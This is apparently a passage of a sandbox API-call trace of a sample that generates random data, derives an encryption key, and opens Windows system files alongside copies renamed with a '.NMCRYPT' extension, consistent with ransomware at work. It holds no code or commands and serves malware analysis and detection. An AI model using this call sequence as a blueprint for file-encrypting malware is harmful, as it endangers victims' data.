1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.227] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.231] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.231] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.231] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0159.231] CryptHashData (hHash=0x9ad678, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.231] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad678, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad578) returned 1 [0159.231] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0159.231] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0159.231] wcslen (_String="\\\\?\\") returned 0x4 [0159.231] CryptDuplicateKey (in: hKey=0x9ad578, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad5b8) returned 1 [0159.231] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0159.232] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft 